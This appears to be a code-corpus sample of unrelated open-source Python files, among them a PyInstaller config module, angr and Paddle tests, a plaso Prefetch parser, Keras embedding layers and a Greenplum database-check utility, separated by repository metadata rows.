def switchEngineStatus(self):
"""开关风控引擎"""
self.active = not self.active
if self.active:
self.writeRiskLog(u'风险管理功能启动')
else:
self.writeRiskLog(u'风险管理功能停止')
#----------------------------------------------------------------------
def stop(self):
"""停止"""
self.saveSetting()
| mit | -7,094,344,327,007,677,000 | 30.79845 | 118 | 0.469405 | false |
ijat/Hotspot-PUTRA-Auto-login | PyInstaller-3.2/PyInstaller/config.py | 1 | 1630 | #-----------------------------------------------------------------------------
# Copyright (c) 2005-2016, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
"""
This module holds run-time PyInstaller configuration.
Variable CONF is a dict() with all configuration options that are necessary
for the build phase. Build phase is done by passing .spec file to exec()
function. CONF variable is the only way how to pass arguments to exec() and
how to avoid using 'global' variables.
NOTE: Having 'global' variables does not play well with the test suite
because it does not provide isolated environments for tests. Some tests might
fail in this case.
NOTE: The 'CONF' dict() is cleaned after building phase to not interfere with
any other possible test.
To pass any arguments to build phase, just do:
from PyInstaller.config import CONF
CONF['my_var_name'] = my_value
And to use this variable in the build phase:
from PyInstaller.config import CONF
foo = CONF['my_var_name']
This is the list of known variables. (Please update it if necessary.)
cachedir
hasUPX
hiddenimports
noconfirm
pathex
ui_admin
ui_access
upx_dir
workpath
tests_modgraph - cached PyiModuleGraph object to speed up tests
"""
# NOTE: Do not import other PyInstaller modules here. Just define constants here.
CONF = {
# Unit tests require this key to exist.
'pathex': [],
}
| gpl-3.0 | 8,850,864,767,512,552,000 | 27.596491 | 81 | 0.684049 | false |
xurantju/angr | tests/test_veritesting.py | 9 | 2565 | import nose
import angr
import logging
l = logging.getLogger('angr_tests.veritesting')
import os
location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../binaries/tests'))
addresses_veritesting_a = {
'x86_64': 0x400674
}
addresses_veritesting_b = {
'x86_64': 0x4006af
}
def run_veritesting_a(arch):
# TODO: Added timeout control, since a failed state merging will result in running for a long time
#logging.getLogger('angr.analyses.sse').setLevel(logging.DEBUG)
proj = angr.Project(os.path.join(os.path.join(location, arch), "veritesting_a"),
load_options={'auto_load_libs': False},
use_sim_procedures=True
)
ex = proj.surveyors.Explorer(find=(addresses_veritesting_a[arch], ), enable_veritesting=True)
r = ex.run()
nose.tools.assert_not_equal(len(r.found), 0)
# Make sure the input makes sense
for f in r.found:
input_str = f.state.plugins['posix'].dumps(0)
nose.tools.assert_equal(input_str.count('B'), 10)
def run_veritesting_b(arch):
#logging.getLogger('angr.analyses.sse').setLevel(logging.DEBUG)
#logging.getLogger('angr.surveyor').setLevel(logging.DEBUG)
#logging.getLogger('angr.surveyors.explorer').setLevel(logging.DEBUG)
proj = angr.Project(os.path.join(os.path.join(location, arch), "veritesting_b"),
load_options={'auto_load_libs': False},
use_sim_procedures=True
)
ex = proj.surveyors.Explorer(find=(addresses_veritesting_b[arch], ),
enable_veritesting=True,
veritesting_options={'enable_function_inlining': True})
r = ex.run()
nose.tools.assert_not_equal(len(r.found), 0)
# Make sure the input makes sense
for f in r.found:
input_str = f.state.plugins['posix'].dumps(0)
nose.tools.assert_equal(input_str.count('B'), 35)
def test_veritesting_a():
# This is the most basic test
for arch in addresses_veritesting_a.keys():
yield run_veritesting_a, arch
def test_veritesting_b():
# Advanced stuff - it tests for the ability to inline simple functions
# as well as simple syscalls like read/write
for arch in addresses_veritesting_b.keys():
yield run_veritesting_b, arch
if __name__ == "__main__":
for test_func, arch_name in test_veritesting_a():
test_func(arch_name)
for test_func, arch_name in test_veritesting_b():
test_func(arch_name)
| bsd-2-clause | -1,652,851,049,905,606,000 | 35.126761 | 102 | 0.630409 | false |
joachimmetz/plaso | plaso/parsers/winprefetch.py | 4 | 7030 | # -*- coding: utf-8 -*-
"""Parser for Windows Prefetch files."""
import pyscca
from dfdatetime import filetime as dfdatetime_filetime
from dfdatetime import semantic_time as dfdatetime_semantic_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.containers import windows_events
from plaso.lib import definitions
from plaso.lib import specification
from plaso.parsers import interface
from plaso.parsers import manager
class WinPrefetchExecutionEventData(events.EventData):
"""Windows Prefetch event data.
Attributes:
executable (str): executable filename.
format_version (int): format version.
mapped_files (list[str]): mapped filenames.
number_of_volumes (int): number of volumes.
path_hints (list[str]): possible full paths to the executable.
prefetch_hash (int): prefetch hash.
run_count (int): run count.
volume_device_paths (list[str]): volume device paths.
volume_serial_numbers (list[int]): volume serial numbers.
"""
DATA_TYPE = 'windows:prefetch:execution'
def __init__(self):
"""Initializes event data."""
super(WinPrefetchExecutionEventData, self).__init__(
data_type=self.DATA_TYPE)
self.executable = None
self.mapped_files = None
self.number_of_volumes = None
self.path_hints = None
self.prefetch_hash = None
self.run_count = None
self.version = None
self.volume_device_paths = None
self.volume_serial_numbers = None
class WinPrefetchParser(interface.FileObjectParser):
"""A parser for Windows Prefetch files."""
_INITIAL_FILE_OFFSET = None
NAME = 'prefetch'
DATA_FORMAT = 'Windows Prefetch File (PF)'
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'SCCA', offset=4)
format_specification.AddNewSignature(b'MAM\x04', offset=0)
return format_specification
def _ParseSCCAFile(self, parser_mediator, scca_file):
"""Parses a Windows Prefetch (SCCA) file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
scca_file (pyscca.file): Windows Prefetch (SCCA) file
Raises:
IOError: if the Windows Prefetch (SCCA) file cannot be parsed.
"""
format_version = scca_file.format_version
executable_filename = scca_file.executable_filename
prefetch_hash = scca_file.prefetch_hash
run_count = scca_file.run_count
number_of_volumes = scca_file.number_of_volumes
volume_serial_numbers = []
volume_device_paths = []
path_hints = []
for volume_information in iter(scca_file.volumes):
volume_serial_number = volume_information.serial_number
volume_device_path = volume_information.device_path
volume_serial_numbers.append(volume_serial_number)
volume_device_paths.append(volume_device_path)
timestamp = volume_information.get_creation_time_as_integer()
if timestamp:
event_data = windows_events.WindowsVolumeEventData()
event_data.device_path = volume_device_path
event_data.origin = parser_mediator.GetFilename()
event_data.serial_number = volume_serial_number
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_CREATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
for filename in iter(scca_file.filenames):
if not filename:
continue
if (filename.startswith(volume_device_path) and
filename.endswith(executable_filename)):
_, _, path = filename.partition(volume_device_path)
path_hints.append(path)
mapped_files = []
for entry_index, file_metrics in enumerate(scca_file.file_metrics_entries):
mapped_file_string = file_metrics.filename
if not mapped_file_string:
parser_mediator.ProduceExtractionWarning(
'missing filename for file metrics entry: {0:d}'.format(
entry_index))
continue
file_reference = file_metrics.file_reference
if file_reference:
mapped_file_string = (
'{0:s} [{1:d}-{2:d}]').format(
mapped_file_string, file_reference & 0xffffffffffff,
file_reference >> 48)
mapped_files.append(mapped_file_string)
event_data = WinPrefetchExecutionEventData()
event_data.executable = executable_filename
event_data.mapped_files = mapped_files
event_data.number_of_volumes = number_of_volumes
event_data.path_hints = path_hints
event_data.prefetch_hash = prefetch_hash
event_data.run_count = run_count
event_data.version = format_version
event_data.volume_device_paths = volume_device_paths
event_data.volume_serial_numbers = volume_serial_numbers
timestamp = scca_file.get_last_run_time_as_integer(0)
if not timestamp:
parser_mediator.ProduceExtractionWarning('missing last run time')
date_time = dfdatetime_semantic_time.NotSet()
else:
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_RUN)
parser_mediator.ProduceEventWithEventData(event, event_data)
# Check for the 7 older last run time values available since
# format version 26.
if format_version >= 26:
for last_run_time_index in range(1, 8):
timestamp = scca_file.get_last_run_time_as_integer(last_run_time_index)
if not timestamp:
continue
date_time = dfdatetime_filetime.Filetime(timestamp=timestamp)
date_time_description = 'Previous {0:s}'.format(
definitions.TIME_DESCRIPTION_LAST_RUN)
event = time_events.DateTimeValuesEvent(
date_time, date_time_description)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a Windows Prefetch file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): file-like object.
"""
scca_file = pyscca.file()
try:
scca_file.open_file_object(file_object)
except IOError as exception:
parser_mediator.ProduceExtractionWarning(
'unable to open file with error: {0!s}'.format(exception))
return
try:
self._ParseSCCAFile(parser_mediator, scca_file)
except IOError as exception:
parser_mediator.ProduceExtractionWarning(
'unable to parse file with error: {0!s}'.format(exception))
finally:
scca_file.close()
manager.ParsersManager.RegisterParser(WinPrefetchParser)
| apache-2.0 | 1,235,760,220,335,901,000 | 34.15 | 79 | 0.696159 | false |
luotao1/Paddle | python/paddle/fluid/tests/unittests/test_squeeze2_op.py | 2 | 2178 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
paddle.enable_static()
# Correct: General.
class TestSqueezeOp(OpTest):
def setUp(self):
self.op_type = "squeeze2"
self.init_test_case()
self.inputs = {"X": np.random.random(self.ori_shape).astype("float64")}
self.init_attrs()
self.outputs = {
"Out": self.inputs["X"].reshape(self.new_shape),
"XShape": np.random.random(self.ori_shape).astype("float64")
}
def test_check_output(self):
self.check_output(no_check_set=['XShape'])
def test_check_grad(self):
self.check_grad(["X"], "Out")
def init_test_case(self):
self.ori_shape = (1, 3, 1, 40)
self.axes = (0, 2)
self.new_shape = (3, 40)
def init_attrs(self):
self.attrs = {"axes": self.axes}
# Correct: There is mins axis.
class TestSqueezeOp1(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (1, 20, 1, 5)
self.axes = (0, -2)
self.new_shape = (20, 5)
# Correct: No axes input.
class TestSqueezeOp2(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (1, 20, 1, 5)
self.axes = ()
self.new_shape = (20, 5)
# Correct: Just part of axes be squeezed.
class TestSqueezeOp3(TestSqueezeOp):
def init_test_case(self):
self.ori_shape = (6, 1, 5, 1, 4, 1)
self.axes = (1, -1)
self.new_shape = (6, 5, 1, 4)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -133,971,170,509,584,770 | 26.923077 | 79 | 0.629936 | false |
kiith-sa/QGIS | python/plugins/processing/taudem/slopearea.py | 4 | 4036 | # -*- coding: utf-8 -*-
"""
***************************************************************************
slopearea.py
---------------------
Date : October 2012
Copyright : (C) 2012 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'October 2012'
__copyright__ = '(C) 2012, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import \
GeoAlgorithmExecutionException
from processing.parameters.ParameterRaster import ParameterRaster
from processing.parameters.ParameterNumber import ParameterNumber
from processing.outputs.OutputRaster import OutputRaster
from processing.tools.system import *
from processing.taudem.TauDEMUtils import TauDEMUtils
class SlopeArea(GeoAlgorithm):
SLOPE_GRID = 'SLOPE_GRID'
AREA_GRID = 'AREA_GRID'
SLOPE_EXPONENT = 'SLOPE_EXPONENT'
AREA_EXPONENT = 'AREA_EXPONENT'
SLOPE_AREA_GRID = 'SLOPE_AREA_GRID'
def getIcon(self):
return QIcon(os.path.dirname(__file__) + '/../images/taudem.png')
def defineCharacteristics(self):
self.name = 'Slope Area Combination'
self.cmdName = 'slopearea'
self.group = 'Stream Network Analysis tools'
self.addParameter(ParameterRaster(self.SLOPE_GRID, 'Slope Grid',
False))
self.addParameter(ParameterRaster(self.AREA_GRID,
'Contributing Area Grid', False))
self.addParameter(ParameterNumber(self.SLOPE_EXPONENT, 'Slope Exponent'
, 0, None, 2))
self.addParameter(ParameterNumber(self.AREA_EXPONENT, 'Area Exponent',
0, None, 1))
self.addOutput(OutputRaster(self.SLOPE_AREA_GRID, 'Slope Area Grid'))
def processAlgorithm(self, progress):
commands = []
commands.append(os.path.join(TauDEMUtils.mpiexecPath(), 'mpiexec'))
processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
if processNum <= 0:
raise GeoAlgorithmExecutionException('Wrong number of MPI \
processes used.\nPlease set correct number before running \
TauDEM algorithms.')
commands.append('-n')
commands.append(str(processNum))
commands.append(os.path.join(TauDEMUtils.taudemPath(), self.cmdName))
commands.append('-slp')
commands.append(self.getParameterValue(self.SLOPE_GRID))
commands.append('-sca')
commands.append(self.getParameterValue(self.AREA_GRID))
commands.append('-par')
commands.append(str(self.getParameterValue(self.SLOPE_EXPONENT)))
commands.append(str(self.getParameterValue(self.AREA_EXPONENT)))
commands.append('-sa')
commands.append(self.getOutputValue(self.SLOPE_AREA_GRID))
loglines = []
loglines.append('TauDEM execution command')
for line in commands:
loglines.append(line)
ProcessingLog.addToLog(ProcessingLog.LOG_INFO, loglines)
TauDEMUtils.executeTauDEM(commands, progress)
| gpl-2.0 | 6,994,056,990,638,089,000 | 37.807692 | 79 | 0.59886 | false |
demikl/freeboxv5-status | setup.py | 1 | 1180 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.install import install
VERSION = "1.1.1"
def readme():
"""print long description"""
with open('README.md') as f:
return f.read()
class VerifyVersionCommand(install):
"""Custom command to verify that the git tag matches our version"""
description = 'verify that the git tag matches our version'
def run(self):
tag = os.getenv('CIRCLE_TAG')
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(
tag, VERSION
)
sys.exit(info)
setup(
name='freebox_v5_status',
version=VERSION,
url='http://github.com/demikl/freeboxv5-status',
author='Mickael Le Baillif',
author_email='[email protected]',
license='MIT',
description='Parse Freebox V5 status page',
long_description=readme(),
keywords='freebox adsl',
packages=['freebox_v5_status'],
scripts=['bin/freebox_to_graphite.py', 'bin/freebox_show_status.py'],
cmdclass={
'verify': VerifyVersionCommand,
}
)
| mit | -3,860,262,843,807,350,000 | 24.652174 | 85 | 0.630508 | false |
Duoxilian/home-assistant | homeassistant/components/zwave/workaround.py | 4 | 2913 | """Zwave workarounds."""
from . import const
# Manufacturers
FIBARO = 0x010f
PHILIO = 0x013c
WENZHOU = 0x0118
SOMFY = 0x47
# Product IDs
PHILIO_SLIM_SENSOR = 0x0002
PHILIO_3_IN_1_SENSOR_GEN_4 = 0x000d
# Product Types
FGFS101_FLOOD_SENSOR_TYPE = 0x0b00
FGRM222_SHUTTER2 = 0x0301
PHILIO_SENSOR = 0x0002
SOMFY_ZRTSI = 0x5a52
# Mapping devices
PHILIO_SLIM_SENSOR_MOTION_MTII = (PHILIO, PHILIO_SENSOR, PHILIO_SLIM_SENSOR, 0)
PHILIO_3_IN_1_SENSOR_GEN_4_MOTION_MTII = (
PHILIO, PHILIO_SENSOR, PHILIO_3_IN_1_SENSOR_GEN_4, 0)
WENZHOU_SLIM_SENSOR_MOTION_MTII = (
WENZHOU, PHILIO_SENSOR, PHILIO_SLIM_SENSOR, 0)
# Workarounds
WORKAROUND_NO_OFF_EVENT = 'trigger_no_off_event'
WORKAROUND_NO_POSITION = 'workaround_no_position'
WORKAROUND_REVERSE_OPEN_CLOSE = 'reverse_open_close'
WORKAROUND_IGNORE = 'workaround_ignore'
# List of workarounds by (manufacturer_id, product_type, product_id, index)
DEVICE_MAPPINGS_MTII = {
PHILIO_SLIM_SENSOR_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
PHILIO_3_IN_1_SENSOR_GEN_4_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
WENZHOU_SLIM_SENSOR_MOTION_MTII: WORKAROUND_NO_OFF_EVENT,
}
SOMFY_ZRTSI_CONTROLLER_MT = (SOMFY, SOMFY_ZRTSI)
FIBARO_FGRM222_MT = (FIBARO, FGRM222_SHUTTER2)
# List of workarounds by (manufacturer_id, product_type)
DEVICE_MAPPINGS_MT = {
SOMFY_ZRTSI_CONTROLLER_MT: WORKAROUND_NO_POSITION,
FIBARO_FGRM222_MT: WORKAROUND_REVERSE_OPEN_CLOSE,
}
# Component mapping devices
FIBARO_FGFS101_SENSOR_ALARM = (
FIBARO, FGFS101_FLOOD_SENSOR_TYPE, const.COMMAND_CLASS_SENSOR_ALARM)
FIBARO_FGRM222_BINARY = (
FIBARO, FGRM222_SHUTTER2, const.COMMAND_CLASS_SWITCH_BINARY)
# List of component workarounds by
# (manufacturer_id, product_type, command_class)
DEVICE_COMPONENT_MAPPING = {
FIBARO_FGFS101_SENSOR_ALARM: 'binary_sensor',
FIBARO_FGRM222_BINARY: WORKAROUND_IGNORE,
}
def get_device_component_mapping(value):
"""Get mapping of value to another component."""
if (value.node.manufacturer_id.strip() and
value.node.product_type.strip()):
manufacturer_id = int(value.node.manufacturer_id, 16)
product_type = int(value.node.product_type, 16)
return DEVICE_COMPONENT_MAPPING.get(
(manufacturer_id, product_type, value.command_class))
return None
def get_device_mapping(value):
"""Get mapping of value to a workaround."""
if (value.node.manufacturer_id.strip() and
value.node.product_id.strip() and
value.node.product_type.strip()):
manufacturer_id = int(value.node.manufacturer_id, 16)
product_type = int(value.node.product_type, 16)
product_id = int(value.node.product_id, 16)
result = DEVICE_MAPPINGS_MTII.get(
(manufacturer_id, product_type, product_id, value.index))
if result:
return result
return DEVICE_MAPPINGS_MT.get((manufacturer_id, product_type))
return None
| mit | 5,112,011,688,955,108,000 | 31.366667 | 79 | 0.708205 | false |
justiniso/cmsbase | quokka/ext/commands_collector.py | 11 | 1760 | import sys
import os
import click
import importlib
class CommandsCollector(click.MultiCommand):
"""A MultiCommand to collect all click commands from a given
modules path and base name for the module.
The commands functions needs to be in a module inside commands
folder and the name of the file will be used as the command name.
"""
def __init__(self, modules_path, base_module_name, **attrs):
click.MultiCommand.__init__(self, **attrs)
self.base_module_name = base_module_name
self.modules_path = modules_path
def list_commands(self, ctx):
commands = []
for _path, _dir, _ in os.walk(self.modules_path):
if 'commands' not in _dir:
continue
for filename in os.listdir(os.path.join(_path, 'commands')):
if filename.endswith('.py') and filename != '__init__.py':
cmd = filename[:-3]
_, module_name = os.path.split(_path)
commands.append('{}_{}'.format(module_name, cmd))
commands.sort()
return commands
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
splitted = name.split('_')
if len(splitted) <= 1:
return
module_name, command_name = splitted
if not all([module_name, command_name]):
return
module = '{}.{}.commands.{}'.format(
self.base_module_name,
module_name,
command_name)
mod = importlib.import_module(module)
except ImportError:
return
return getattr(mod, 'cli', None)
| mit | 7,906,761,460,361,110,000 | 34.918367 | 74 | 0.550568 | false |
Cadene/keras | keras/layers/embeddings.py | 5 | 4851 | from __future__ import absolute_import
import theano
import theano.tensor as T
from .. import activations, initializations, regularizers, constraints
from ..layers.core import Layer, MaskedLayer
from ..utils.theano_utils import sharedX
from ..constraints import unitnorm
class Embedding(Layer):
'''
Turn positive integers (indexes) into denses vectors of fixed size.
eg. [[4], [20]] -> [[0.25, 0.1], [0.6, -0.2]]
@input_dim: size of vocabulary (highest input integer + 1)
@out_dim: size of dense representation
'''
def __init__(self, input_dim, output_dim, init='uniform',
W_regularizer=None, activity_regularizer=None, W_constraint=None,
mask_zero=False, weights=None):
super(Embedding, self).__init__()
self.init = initializations.get(init)
self.input_dim = input_dim
self.output_dim = output_dim
self.input = T.imatrix()
self.W = self.init((self.input_dim, self.output_dim))
self.mask_zero = mask_zero
self.params = [self.W]
self.W_constraint = constraints.get(W_constraint)
self.constraints = [self.W_constraint]
self.regularizers = []
self.W_regularizer = regularizers.get(W_regularizer)
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if weights is not None:
self.set_weights(weights)
def get_output_mask(self, train=None):
X = self.get_input(train)
if not self.mask_zero:
return None
else:
return T.ones_like(X) * (1 - T.eq(X, 0))
def get_output(self, train=False):
X = self.get_input(train)
out = self.W[X]
return out
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"output_dim": self.output_dim,
"init": self.init.__name__,
"activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
"W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
"W_constraint": self.W_constraint.get_config() if self.W_constraint else None}
class WordContextProduct(Layer):
'''
This layer turns a pair of words (a pivot word + a context word,
ie. a word from the same context, or a random, out-of-context word),
indentified by their index in a vocabulary, into two dense reprensentations
(word representation and context representation).
Then it returns activation(dot(pivot_embedding, context_embedding)),
which can be trained to encode the probability
of finding the context word in the context of the pivot word
(or reciprocally depending on your training procedure).
The layer ingests integer tensors of shape:
(nb_samples, 2)
and outputs a float tensor of shape
(nb_samples, 1)
The 2nd dimension encodes (pivot, context).
input_dim is the size of the vocabulary.
For more context, see Mikolov et al.:
Efficient Estimation of Word reprensentations in Vector Space
http://arxiv.org/pdf/1301.3781v3.pdf
'''
def __init__(self, input_dim, proj_dim=128,
init='uniform', activation='sigmoid', weights=None):
super(WordContextProduct, self).__init__()
self.input_dim = input_dim
self.proj_dim = proj_dim
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.input = T.imatrix()
# two different embeddings for pivot word and its context
# because p(w|c) != p(c|w)
self.W_w = self.init((input_dim, proj_dim))
self.W_c = self.init((input_dim, proj_dim))
self.params = [self.W_w, self.W_c]
if weights is not None:
self.set_weights(weights)
def get_output(self, train=False):
X = self.get_input(train)
w = self.W_w[X[:, 0]] # nb_samples, proj_dim
c = self.W_c[X[:, 1]] # nb_samples, proj_dim
dot = T.sum(w * c, axis=1)
dot = theano.tensor.reshape(dot, (X.shape[0], 1))
return self.activation(dot)
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"proj_dim": self.proj_dim,
"init": self.init.__name__,
"activation": self.activation.__name__}
| mit | 4,487,056,170,492,720,000 | 35.473684 | 118 | 0.604824 | false |
hiaselhans/OpenGlider | tests/test_patterns.py | 2 | 1407 | import unittest
import tempfile
import os
import openglider
import openglider.plots
import openglider.plots.glider
from common import TestCase
TEMPDIR = tempfile.gettempdir()
class TestPlots(TestCase):
def setUp(self, complete=True):
self.glider_2d = self.import_glider_2d()
self.glider_3d = self.glider_2d.get_glider_3d()
self.plotmaker = openglider.plots.PlotMaker(self.glider_3d)
@unittest.skip("not working")
def test_patterns_panels(self):
self.plotmaker.get_panels()
dwg = self.plotmaker.get_all_stacked()["panels"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_panels.dxf"))
# Traceback (most recent call last):
# File "/home/travis/build/booya-at/OpenGlider/tests/test_patterns.py", line 22, in test_patterns_dribs
# dwg = self.plotmaker.get_all_stacked()["dribs"]
# AttributeError: 'PlotMaker' object has no attribute 'get_all_stacked'
@unittest.skip("not working")
def test_patterns_dribs(self):
self.plotmaker.get_dribs()
dwg = self.plotmaker.get_all_stacked()["dribs"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_dribs.dxf"))
@unittest.skip("not working")
def test_patterns_ribs(self):
self.plotmaker.get_ribs()
dwg = self.plotmaker.get_all_stacked()["ribs"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_ribs.dxf"))
if __name__ == "__main__":
unittest.main() | gpl-3.0 | 336,995,790,583,398,340 | 32.52381 | 105 | 0.678038 | false |
redbox-mint/redbox | config/src/main/config/home/lib/jython/alertlib/NewAlerts.py | 1 | 2631 | import shutil
import sys
import os
from com.googlecode.fascinator import HarvestClient
from com.googlecode.fascinator.common import FascinatorHome
from com.googlecode.fascinator.common import JsonObject
from com.googlecode.fascinator.common import JsonSimple
from java.io import File
from java.io import FileInputStream
from java.io import InputStreamReader
from java.lang import Exception
from java.util import LinkedHashMap
from org.json.simple import JSONArray
from Alert import Alert
from AlertException import AlertException
from Mapper import *
class NewAlerts:
"""The AlertsData class is the 'entry point' for the alert system.
See the README.md in this folder for further information
"""
def run(self, context):
self.log = context["log"]
self.config = context["systemConfig"]
self.log.debug("Started alerts processing.")
#self.log.debug("Alert config: " + self.config.toString(True))
## Determine ReDBox version in system-config
self.redboxVersion = self.config.getString(None, "redbox.version.string")
self.log.debug("ReDBox version is %s" % self.redboxVersion)
if self.redboxVersion is None:
self.log.debug("ReDBox version was not provided in the config")
raise AlertException("Unable to determine configuration")
tmpConf = self.config.getObject('new-alerts')
if tmpConf is None:
self.log.info("No alert configuration was provided")
return False
self.alertsConfig = mapMapFromJava(tmpConf)
baseline = {}
if "baseline" in self.alertsConfig:
baseline = self.alertsConfig["baseline"]
if not 'alertSet' in self.alertsConfig:
raise AlertException("Unable to determine configuration")
for alertItem in self.alertsConfig["alertSet"]:
self.log.info("Processing alert: %s." % alertItem["name"])
try:
alert = Alert(self.redboxVersion, alertItem, baseline, self.log)
alert.processAlert()
except Exception, e:
#The Alert class will log this for us so continue to the next alert
#Some exceptions stop an alert from running at all so log them just in case
self.log.error("Alert [%s] encountered problems - please review the log files in the associated .processed directory. Exception was: %s" % (alertItem["name"], e.message))
self.log.debug("Alerts processing complete.")
return True
| gpl-2.0 | 5,667,524,529,944,497,000 | 35.041096 | 186 | 0.657925 | false |
outofmem0ry/incubator-hawq | tools/bin/lib/gpcheckdb.py | 12 | 7952 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
gpcheckdb - checks db for required upkeep actions
Usage: gpcheckdb [-U uname] [-h host] [-p port] [-d dbname]
-U: database user name (PGUSER)
-h: database server host (PGHOST)
-p: database server port (PGPORT)
-d: database name (PGDATABASE)
-v: verbose
-V: very verbose
'''
import os, sys
progname = os.path.split(sys.argv[0])[-1]
if sys.version_info < (2,5,0):
sys.exit(
'''Error %s is supported on Python version 2.5 or greater
Please upgrade python installed on this machine.''' % progname)
import subprocess, time, datetime, threading, Queue, pickle, random
############
class __globals__:
opt = {}
for o in 'vV': opt['-' + o] = False
opt['-U'] = os.getenv('PGUSER') or ''
opt['-h'] = os.getenv('PGHOST') or ''
opt['-p'] = os.getenv('PGPORT') or ''
opt['-d'] = os.getenv('PGDATABASE') or ''
GV = __globals__()
############
def usage(exitarg):
print __doc__
sys.exit(exitarg)
############
def humantime(td):
d = td.days > 0 and td.days or 0
h = int(td.seconds / 60 / 60)
m = int(td.seconds / 60) % 60
s = td.seconds % 60
ret = ''
if d: ret = ret + '%dD ' % d
if h: ret = ret + '%dh ' % h
ret = ret + ('%dm %ds' % (m, s))
return ret
############
def tstamp():
return datetime.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')
############
def msg(s):
print '%s %s' % (tstamp(), s)
def vmsg(s):
if GV.opt['-v']: msg(s)
def vvmsg(s):
if GV.opt['-V']: msg(s)
############
def die(s):
sys.exit('%s ERROR: %s' % (tstamp(), s))
############
def confirm(s):
if not GV.opt['-f'] and sys.stdin.isatty():
ok = raw_input('%s\n ... proceed (y/n)? ' % s)
print
ok = ok.strip().lower()
return ok and ok[0] == 'y'
return True
############
def parseCommandLine():
import getopt
try:
(options, args) = getopt.getopt(sys.argv[1:], '?VvU:h:p:d:')
except Exception, e:
usage('Error: ' + str(e))
for (switch, val) in options:
if switch == '-?': usage(0)
elif switch[1] in 'Vv': GV.opt[switch] = True
elif switch[1] in 'Uhpd': GV.opt[switch] = val
if not GV.opt['-d']:
usage('Error: please specify -d database')
if not GV.opt['-U']:
usage('Error: please specify -U user')
############
def run(cmd):
vvmsg(cmd)
p = os.popen(cmd)
out = p.readlines()
if GV.opt['-V']:
for line in out: vvmsg(line[:-1])
rc = p.close()
return (rc, out)
#####################################################
def psql_open(sql, echo=False, quiet=True):
sql = sql.strip()
if echo: msg("SQL: " + sql)
cmd = ['psql']
if quiet: cmd.append('-q')
cmd.append('-At')
cmd.append('-c')
cmd.append(sql)
stime = time.time()
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
p.x_echo = echo
p.x_quiet = quiet
p.x_stime = stime
p.x_sql = sql
return p
def psql_wait(p):
out = p.stdout.readlines()
rc = p.wait()
etime = time.time()
if not p.x_quiet:
for i in out: print i,
if rc:
die('PSQL ERROR\nSQL: ' + p.x_sql)
if p.x_echo:
msg("ELAPSED: " + str(etime - p.x_stime))
return out
